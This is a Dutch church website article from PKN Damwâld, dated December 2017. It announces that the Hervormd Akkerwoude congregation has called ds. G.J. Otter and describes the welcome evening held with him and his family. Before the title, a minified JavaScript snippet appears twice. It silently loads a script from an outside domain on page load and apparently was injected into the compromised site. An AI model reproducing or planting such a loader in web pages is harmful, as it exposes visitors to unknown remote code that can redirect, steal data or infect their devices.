;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kennismaking met ds. G.J. Otter & echtgenote - PKN Damwâld

Kennismaking met ds. G.J. Otter & echtgenote

Gepubliceerd op: donderdag 28 december 2017

Zondagmorgen 24 december mochten we als kerkenraad van Hervormd Akkerwoude c.a. afkondigen dat we een beroep uitbrengen op ds. G.J. Otter uit Emmeloord (Hervormd-West). Ds. Otter studeerde theologie onder andere in Bazel en was vanaf 1997 werkzaam als predikant in Nieuwe Pekela en is vanaf 2004 wijkpredikant in Emmeloord. Ds. Otter is 49 jaar oud, is getrouwd (met Hildegard) en heeft 4 studerende kinderen (Johannes, Elisabeth, Margriet en Rebecca).

Na de dienst werd ds. Otter in het bijzijn van zijn echtgenote, z’n drie dochters en een delegatie van de kerkenraad in de consistorie van de eeuwenoude St. Bonifatiuskerk de beroepsbrief overhandigd.

Op 27 december volgde er een kennismaking met de gemeente, dit met de bedoeling om elkaar te ontmoeten, elkaar beter te leren kennen, om vragen te stellen over de kerk en gemeente en om samen te kijken naar de toekomst.

‘s Middags presenteerden zich al de verschillende colleges van de kerkenraad en beide kerkelijk werkers. Uiteraard was er voldoende tijd ingeruimd voor een genoeglijk gesprek met ds. S. Boukes, predikant van onze (PKN) partnergemeente Gereformeerd Damwâld en onze consulent ds. W.L. de Jong (PG Rinsumageast) en werd familie Otter verrast met een rondleiding door Damwâld en omgeving. ‘s Avonds was – met een groot compliment aan alle jeugd die ook present was – een bomvol ’t Skûlplak het toneel voor een afwisselende avond waar ondermeer een presentatie van de beroepingscommissie was te bewonderen. En natuurlijk presenteerde het predikantsechtpaar zich ook tijdens deze gezellige kennismakingsbijeenkomst.

De bijeenkomst eindigde met een veelzeggend applaus. Want misschien was dat wel het belangrijkste resultaat van de avond: wat gezegd moest worden werd gezegd en  – hierbij terugdenkend aan de slotwoorden van ds. Otter vanuit Jesaja 55 – nog belangrijker: dat we elkaar in deze tijd van beroeping mochten ontmoeten in Zijn naam en dat we samen God zoeken en tijd voor Hem nemen, omdat Hij zich laat vinden. Samen gemeente van Christus willen zijn en blijven. De Heer biedt daartoe zijn voedende woorden aan. Het enige wat Hij van ons verwacht is dat wij bij Hem komen, luisteren naar Zijn levengevende woorden en dat wij in ontvangst nemen wat Hij ons aanbiedt.

Ds. Otter is een predikant die heel goed past in het opgestelde profiel. Wij menen in de persoon van ds. Otter een predikant te hebben gevonden die onze gemeente opnieuw kan inspireren. Ds. Otter past bij onze gemeente en bij onze situatie. Een bewogen mens, openstaand voor de ander, jong van geest en energiek.

We hopen  dat deze avond ertoe heeft bijgedragen dat ds. en mw. Otter (en gezin) zich zeer welkom en gewenst weten. Dat zij ervaren mogen hebben dat er een biddende gemeente in Damwâld op hen wacht; in het vertrouwen dat de Heer, onze God hen wijsheid zal schenken bij het nemen van hun beslissing.